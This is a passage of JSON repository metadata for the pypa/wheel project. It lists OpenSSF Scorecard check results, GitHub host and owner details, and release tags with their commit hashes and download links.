2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.e